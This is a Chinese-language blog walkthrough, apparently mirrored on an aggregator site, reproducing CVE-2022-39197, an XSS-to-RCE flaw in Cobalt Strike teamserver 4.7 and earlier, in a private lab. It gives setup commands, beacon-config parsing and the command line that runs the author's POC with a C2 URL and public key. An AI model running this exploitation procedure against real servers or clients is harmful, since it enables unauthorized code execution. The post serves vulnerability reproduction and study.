码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • CVE-2022-39197(CobaltStrike XSS <=4.7)漏洞复现


    最新文章更新见个人博客

    漏洞说明

    根据9.20日CobaltStrike官方发布的最新4.7.1版本的更新日志中介绍,<=4.7的teamserver版本存在XSS漏洞,从而可以造成RCE远程代码执行

    一位名为“Beichendream”的独立研究人员联系我们,告知我们他们在团队服务器中发现的一个 XSS 漏洞。这将允许攻击者在 Beacon 配置中设置格式错误的用户名,从而允许他们远程执行代码RCE。


    复现过程

    根据漏洞原理,类似之前使用的cs上线器,稍微修改一下上线的payload即可。

    测试环境

    服务端:Ubuntu20.04+JDK11+CS4.3 (IP: 172.16.12.13)

    客户端:M2 macOS Monterey 12.5 + JDK17 (IP: 172.16.12.2)

    用到的工具:CobaltStrikeParser、CVE-2022-39197 POC


    环境搭建

    # ubuntu
    chmod +x teamserver
    ./teamserver 172.16.12.13 haha123
    # macOS--提供图片加载服务,如果联网的话可以省略该步,使用任意在线图片的url
    brew install node@14
    npm i --global serve
    serve		# 用serve在图片路径下开启服务, 此处图片文件url为:http://172.16.12.2:3000/logo.png
    

    CS中创建一个listener监听器

    image-20220923195818451

    然后生成一个package木马,经测试,是否勾选x64(即生成的32位和64位均可上线)不影响结果

    image-20220923200124179

    POC使用

    首先对这个生成的beacon进行分析,我们这里使用CobaltStrikeParser这个工具。

    python3 parse_beacon_config.py beacon4.3_x64.exe --json
    

    重点关注如下几个点

    将Port、C2Server、HttpPostUri进行拼接,这里变成:http://172.16.12.13:8080/visit.js/submit.php,记录下来

    将PublicKey复制到一个txt文件中,注意去除前后的空格

    使用我写的POC(编写不易,麻烦加个star吧,后期会把上述分析功能集成,一站式实现)

    python3 cve-2022-39197-poc.py -i http://172.16.12.2:3000/logo.png -u http://172.16.12.13:8080/visit.js/submit.php -k key.txt
    


  • 相关阅读:
    代码随想录算法训练营第五十二天| 309.最佳买卖股票时机含冷冻期 714.买卖股票的最佳时机含手续费
    RSA 简介及 C# 和 js 实现【加密知多少系列】
    手写Promise.all/race/any/settled方法
    Freemarker快速入门(SpringBoot版)
    ThreadLocal的简单理解
    大数据Flink(八十五):Window TVF 支持多维数据分析
    限流算法:时间窗口,令牌桶与漏桶算法对比
    Nocalhost安装操作步骤详解
    用HTML+CSS做一个简单好看的校园社团网页
    开发 Chrome 扩展 之 Hello World 心血来潮
  • 原文地址:https://www.cnblogs.com/xzajyjs/p/16724512.html
  • 最新文章
  • 沪漂五周年了:我越来越迷茫了
    Agentic Skill Routing 实战:别再把所有 Skill 塞进 AI Agent 上下文
    MySQL-Seconds_behind_master的精度误差
    [MAF预定义ChatClient中间件-03]CachingChatClient——利用缓存省钱省时间
    AI的至暗历史:从万众期待到被政府撤资,AI的两次死亡徘徊
    Agent OS :五种驯服不确定性的范式
    PortSwigger SQL注入LAB11
    数据库即时编译JIT
    [Begin]AI Learn Data Day 0
    深度学习进阶(二十七)现代 LLM 的核心架构设计其二:SwiGLU
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号